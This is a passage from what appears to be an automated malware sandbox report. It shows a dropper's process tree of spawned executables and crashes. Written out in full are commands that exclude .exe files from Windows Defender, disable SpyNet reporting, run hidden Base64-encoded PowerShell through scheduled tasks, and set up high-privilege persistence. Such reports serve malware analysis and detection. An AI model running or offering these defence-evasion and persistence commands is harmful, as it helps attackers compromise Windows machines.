11⤵
PID:5012

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "Mon03a60a342de03b.exe" -f
8⤵
- Kills process with taskkill
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03f945a18a7fcd.exe /mixone
4⤵
PID:1152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03ec84cbb8ea.exe
4⤵
PID:4856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon036894b6d48ff5f.exe
4⤵
PID:3368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03e7fcca26693c.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon0360fe2e8b9975052.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03379d13a2633.exe
4⤵
PID:2180

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03379d13a2633.exe
Mon03379d13a2633.exe
5⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2508

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03d03855b9f79.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03e7502f15ce55006.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03ad1a39db.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon03023f5df7427c80a.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 548
4⤵
- Program crash
PID:4184

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03d03855b9f79.exe
Mon03d03855b9f79.exe
1⤵
- Executes dropped EXE
PID:1868

C:\Users\Admin\AppData\Local\Temp\is-IGLQ6.tmp\Mon03d03855b9f79.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IGLQ6.tmp\Mon03d03855b9f79.tmp" /SL5="$A0066,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03d03855b9f79.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:3716

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03d03855b9f79.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03d03855b9f79.exe" /SILENT
3⤵
- Executes dropped EXE
PID:2436

C:\Users\Admin\AppData\Local\Temp\is-P1KSG.tmp\Mon03d03855b9f79.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P1KSG.tmp\Mon03d03855b9f79.tmp" /SL5="$9004C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03d03855b9f79.exe" /SILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2252

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03ec84cbb8ea.exe
Mon03ec84cbb8ea.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03f945a18a7fcd.exe
Mon03f945a18a7fcd.exe /mixone
1⤵
- Executes dropped EXE
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 624
2⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 668
2⤵
- Executes dropped EXE
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 676
2⤵
- Program crash
PID:732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 752
2⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 640
2⤵
- Program crash
PID:1652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 952
2⤵
- Program crash
PID:2220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1076
2⤵
- Program crash
PID:3104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1084
2⤵
- Program crash
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 1232
2⤵
- Program crash
PID:1084

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon036894b6d48ff5f.exe
Mon036894b6d48ff5f.exe
1⤵
- Executes dropped EXE
PID:2264

C:\Users\Admin\Pictures\Adobe Films\8c5sUe8asP9NTcBZRfmXU1Y5.exe
"C:\Users\Admin\Pictures\Adobe Films\8c5sUe8asP9NTcBZRfmXU1Y5.exe"
2⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\7zS3081.tmp\Install.exe
.\Install.exe
3⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\7zS5908.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
PID:488

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:892

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:3064

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:4648

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:3500

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:4576

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:1532

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:1432

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdLatglkO" /SC once /ST 14:36:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:1084

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdLatglkO"
5⤵
PID:5664

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdLatglkO"
5⤵
PID:4300

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 20:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ZFbTCXr.exe\" sw /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5304

C:\Users\Admin\Pictures\Adobe Films\EQRNffgal7SWIS0BUCZuEXBk.exe
"C:\Users\Admin\Pictures\Adobe Films\EQRNffgal7SWIS0BUCZuEXBk.exe"
2⤵
PID:4684

C:\Users\Admin\Pictures\Adobe Films\f2t_I9A1XzWfDkYL9jVqaTsW.exe
"C:\Users\Admin\Pictures\Adobe Films\f2t_I9A1XzWfDkYL9jVqaTsW.exe"
2⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 760
3⤵
- Program crash
PID:6056

C:\Users\Admin\Pictures\Adobe Films\1zRhEqfKymRRbQ5AAfYnyvHh.exe
"C:\Users\Admin\Pictures\Adobe Films\1zRhEqfKymRRbQ5AAfYnyvHh.exe"
2⤵
PID:1068

C:\Users\Admin\Pictures\Adobe Films\1zRhEqfKymRRbQ5AAfYnyvHh.exe
"C:\Users\Admin\Pictures\Adobe Films\1zRhEqfKymRRbQ5AAfYnyvHh.exe" -q
3⤵
PID:5064

C:\Users\Admin\Pictures\Adobe Films\RhI1ON9UsN8CR7MxfvNyvN57.exe
"C:\Users\Admin\Pictures\Adobe Films\RhI1ON9UsN8CR7MxfvNyvN57.exe"
2⤵
PID:1484

C:\Users\Admin\Pictures\Adobe Films\PZX0EYd8idaoawJFK6eAp8aT.exe
"C:\Users\Admin\Pictures\Adobe Films\PZX0EYd8idaoawJFK6eAp8aT.exe"
2⤵
PID:4372

C:\Users\Admin\Documents\TuppStYiTY4vCQLClQK0DzAJ.exe
"C:\Users\Admin\Documents\TuppStYiTY4vCQLClQK0DzAJ.exe"
3⤵
PID:4168

C:\Users\Admin\Pictures\Adobe Films\CelLFadAqJYeTQHaGqv3o7M5.exe
"C:\Users\Admin\Pictures\Adobe Films\CelLFadAqJYeTQHaGqv3o7M5.exe"
4⤵
PID:3376

C:\Users\Admin\Pictures\Adobe Films\0fug0g9k8dmRiy0KJjAehHwy.exe
"C:\Users\Admin\Pictures\Adobe Films\0fug0g9k8dmRiy0KJjAehHwy.exe"
4⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 448
5⤵
- Program crash
PID:4580

C:\Users\Admin\Pictures\Adobe Films\pLWX3mnWQDhbtM1g7kNauGL4.exe
"C:\Users\Admin\Pictures\Adobe Films\pLWX3mnWQDhbtM1g7kNauGL4.exe"
4⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 456
5⤵
- Program crash
PID:6120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 772
5⤵
- Program crash
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 780
5⤵
- Program crash
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 812
5⤵
- Program crash
PID:5336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 792
5⤵
- Program crash
PID:5664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 984
5⤵
- Program crash
PID:2508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1016
5⤵
- Program crash
PID:5432

C:\Users\Admin\Pictures\Adobe Films\IdgVgY5MJ1sLmYQAlMM3wA2A.exe
"C:\Users\Admin\Pictures\Adobe Films\IdgVgY5MJ1sLmYQAlMM3wA2A.exe"
4⤵
PID:3824

C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
5⤵
PID:5252

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Row.potx & ping -n 5 localhost
5⤵
PID:5776

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:5280

C:\Users\Admin\Pictures\Adobe Films\2b3H4Tq1G6WqSKGNgx1G69Z5.exe
"C:\Users\Admin\Pictures\Adobe Films\2b3H4Tq1G6WqSKGNgx1G69Z5.exe"
4⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\7zSAEE8.tmp\Install.exe
.\Install.exe
5⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\7zSE809.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
PID:4564

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:6136

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:1620

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:5476

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:6140

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:1796

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:5600

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:5548

C:\Users\Admin\Pictures\Adobe Films\_HmiFo6ClxSx9D2YPDWmCGq_.exe
"C:\Users\Admin\Pictures\Adobe Films\_HmiFo6ClxSx9D2YPDWmCGq_.exe"
4⤵
PID:5144

C:\Users\Admin\Pictures\Adobe Films\_HmiFo6ClxSx9D2YPDWmCGq_.exe
"C:\Users\Admin\Pictures\Adobe Films\_HmiFo6ClxSx9D2YPDWmCGq_.exe" -q
5⤵
PID:5820

C:\Users\Admin\Pictures\Adobe Films\S1MYpaMwbupVWTAyQ7su3fsP.exe
"C:\Users\Admin\Pictures\Adobe Films\S1MYpaMwbupVWTAyQ7su3fsP.exe"
4⤵
PID:5196

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5196 -s 436
5⤵
- Program crash
PID:5632

C:\Users\Admin\Pictures\Adobe Films\V7vg7HUSGTKTRj3QNSWhfIuc.exe
"C:\Users\Admin\Pictures\Adobe Films\V7vg7HUSGTKTRj3QNSWhfIuc.exe"
4⤵
PID:5128

C:\Users\Admin\Pictures\Adobe Films\_77IIb0TAdL7or5S7U_BeW1H.exe
"C:\Users\Admin\Pictures\Adobe Films\_77IIb0TAdL7or5S7U_BeW1H.exe"
4⤵
PID:2444

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" nFVn.Qh -u /S
5⤵
PID:5384

C:\Users\Admin\Pictures\Adobe Films\uAcNVGrJGNt0ZlJ3FJ4gJjB2.exe
"C:\Users\Admin\Pictures\Adobe Films\uAcNVGrJGNt0ZlJ3FJ4gJjB2.exe"
4⤵
PID:3240

C:\Users\Admin\Pictures\Adobe Films\uAcNVGrJGNt0ZlJ3FJ4gJjB2.exe
"C:\Users\Admin\Pictures\Adobe Films\uAcNVGrJGNt0ZlJ3FJ4gJjB2.exe"
5⤵
PID:5736

C:\Users\Admin\Pictures\Adobe Films\18Od0CMVDlBPi0CDS6peD6kS.exe
"C:\Users\Admin\Pictures\Adobe Films\18Od0CMVDlBPi0CDS6peD6kS.exe"
4⤵
PID:3196

C:\Users\Admin\Pictures\Adobe Films\NkpX8Kj4WGod0_DkIiSuxs49.exe
"C:\Users\Admin\Pictures\Adobe Films\NkpX8Kj4WGod0_DkIiSuxs49.exe"
4⤵
PID:3860

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
5⤵
PID:5792

C:\Users\Admin\Pictures\Adobe Films\QdKrqzSXsYsir93osYrcjpCh.exe
"C:\Users\Admin\Pictures\Adobe Films\QdKrqzSXsYsir93osYrcjpCh.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=XXX
4⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\is-MIH4Q.tmp\QdKrqzSXsYsir93osYrcjpCh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MIH4Q.tmp\QdKrqzSXsYsir93osYrcjpCh.tmp" /SL5="$202CA,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\QdKrqzSXsYsir93osYrcjpCh.exe" /SP-/VERYSILENT /SUPPRESSMSGBOXES /INSTALLERSHOWNELSEWHERE /pid=XXX
5⤵
PID:5348

C:\Users\Admin\Pictures\Adobe Films\XBcHrcEH8vdo4EBc0o5PNkXU.exe
"C:\Users\Admin\Pictures\Adobe Films\XBcHrcEH8vdo4EBc0o5PNkXU.exe"
4⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\SETUP_~1.EXE
5⤵
PID:5376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
6⤵
PID:5640

C:\Users\Admin\Pictures\Adobe Films\bu4Xb4QH6wUU5E4vqnpGpsbG.exe
"C:\Users\Admin\Pictures\Adobe Films\bu4Xb4QH6wUU5E4vqnpGpsbG.exe"
4⤵
PID:212

C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
5⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Film.aspx & ping -n 5 localhost
5⤵
PID:5856

C:\Windows\SysWOW64\cmd.exe
cmd
6⤵
PID:2244

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:1884

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4772

C:\Users\Admin\Pictures\Adobe Films\hpEEjSAmIZEYMT5tQ5HQim11.exe
"C:\Users\Admin\Pictures\Adobe Films\hpEEjSAmIZEYMT5tQ5HQim11.exe"
2⤵
PID:2060

C:\Windows\SysWOW64\at.exe
at 3874982763784yhwgdfg78234789s42809374918uf
3⤵
PID:3780

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Film.aspx & ping -n 5 localhost
3⤵
PID:4420

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:2412

C:\Users\Admin\Pictures\Adobe Films\MH4lWt6LbQiVysIWh78INI9G.exe
"C:\Users\Admin\Pictures\Adobe Films\MH4lWt6LbQiVysIWh78INI9G.exe"
2⤵
PID:732

C:\Users\Admin\Pictures\Adobe Films\tCcfL67DWQ3jvCf7EXi78Kab.exe
"C:\Users\Admin\Pictures\Adobe Films\tCcfL67DWQ3jvCf7EXi78Kab.exe"
2⤵
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 452
3⤵
- Program crash
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 772
3⤵
- Program crash
PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 780
3⤵
- Program crash
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 800
3⤵
- Program crash
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 784
3⤵
- Program crash
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 984
3⤵
- Program crash
PID:5544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 1016
3⤵
- Program crash
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 1380
3⤵
- Program crash
PID:4464

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\hm2TbzbquYJa\Cleaner.exe"
3⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\hm2TbzbquYJa\Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\hm2TbzbquYJa\Cleaner.exe"
4⤵
PID:1460

C:\Users\Admin\Pictures\Adobe Films\vb1m0SfC5dvEY5vw99nL0xKI.exe
"C:\Users\Admin\Pictures\Adobe Films\vb1m0SfC5dvEY5vw99nL0xKI.exe"
2⤵
- Checks computer location settings
PID:2028

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" nFVn.Qh -u /S
3⤵
PID:1212

C:\Users\Admin\Pictures\Adobe Films\3yt_ffXj2qMSf9pV_wNymPp5.exe
"C:\Users\Admin\Pictures\Adobe Films\3yt_ffXj2qMSf9pV_wNymPp5.exe"
2⤵
PID:4480

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
PID:1364

C:\Users\Admin\Pictures\Adobe Films\XAaTGIT5bCqlJvQzxr33BADm.exe
"C:\Users\Admin\Pictures\Adobe Films\XAaTGIT5bCqlJvQzxr33BADm.exe"
2⤵
PID:2404

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2404 -s 424
3⤵
- Program crash
PID:1520

C:\Users\Admin\Pictures\Adobe Films\3kahwq1V6yjbVz3c1YvikzkX.exe
"C:\Users\Admin\Pictures\Adobe Films\3kahwq1V6yjbVz3c1YvikzkX.exe"
2⤵
PID:3944

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~1.EXE
3⤵
PID:424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
4⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon0360fe2e8b9975052.exe
Mon0360fe2e8b9975052.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:380

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon0360fe2e8b9975052.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon0360fe2e8b9975052.exe" -u
2⤵
- Executes dropped EXE
PID:2568

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03e7fcca26693c.exe
Mon03e7fcca26693c.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03e7502f15ce55006.exe
Mon03e7502f15ce55006.exe
1⤵
- Executes dropped EXE
PID:4372

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03ad1a39db.exe
Mon03ad1a39db.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3776

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03ad1a39db.exe
C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03ad1a39db.exe
2⤵
- Executes dropped EXE
PID:2360

C:\Users\Admin\AppData\Local\Temp\7zS0E6312A6\Mon03023f5df7427c80a.exe
Mon03023f5df7427c80a.exe
1⤵
- Executes dropped EXE
PID:572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1476 -ip 1476
1⤵
PID:3508

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Executes dropped EXE
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3724 -ip 3724
1⤵
PID:700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3724 -ip 3724
1⤵
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3724 -ip 3724
1⤵
PID:2352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3724 -ip 3724
1⤵
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3724 -ip 3724
1⤵
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3724 -ip 3724
1⤵
PID:1460

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 2404 -ip 2404
1⤵
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3724 -ip 3724
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3568 -ip 3568
1⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3724 -ip 3724
1⤵
PID:1572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3568 -ip 3568
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3724 -ip 3724
1⤵
PID:3120

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:1880

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 608
3⤵
- Program crash
PID:3084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2264 -ip 2264
1⤵
